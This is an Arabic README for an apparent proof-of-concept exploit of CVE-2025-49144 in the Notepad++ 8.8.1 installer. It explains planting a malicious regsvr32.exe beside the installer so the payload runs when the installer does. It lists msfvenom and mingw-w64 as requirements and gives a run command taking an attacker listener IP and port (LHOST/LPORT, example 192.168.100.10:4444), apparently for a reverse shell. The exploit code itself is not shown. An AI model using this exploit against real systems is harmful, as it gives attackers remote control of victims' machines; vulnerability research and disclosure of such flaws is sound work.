
إثبات المفهوم (PoC) الذي يستغل ثغرة CVE-2025-49144 في مثبّت Notepad++ 8.8.1.
يحتوي هذا المستودع على إثبات مفهوم (PoC) عملي يستغل الثغرة CVE-2025-49144 في مثبّت Notepad++ 8.8.1. يحدث التنفيذ الخبيث بوضع ملف ثنائي (regsvr32.exe) في نفس المجلد الذي يحتوي المثبّت المعرّض للثغرة. عند تشغيل المثبّت، يرث السياق ويشغّل الحمولة.
⚠️ إخلاء مسؤولية
هذا الكود مخصّص لأغراض تعليمية وبحثية فقط. قد يشكّل الاستخدام غير المصرّح به على أنظمة دون إذن صريح انتهاكًا للقانون.
لا يتحمّل المؤلف أي مسؤولية عن أي إساءة استخدام أو نشاط خبيث يتعلّق بهذه الأداة.
msfvenom (جزء من Metasploit Framework)mingw-w64 (x86_64-w64-mingw32-gcc)npp.8.8.1.Installer.x64.exe (يجب وضعه يدويًا في نفس المجلد)python3 exploit.py -i <LHOST> -p <LPORT>
مثال:
python3 exploit.py -i 192.168.100.10 -p 4444
سيؤدي ذلك إلى إنشاء الملفات التالية:
[
]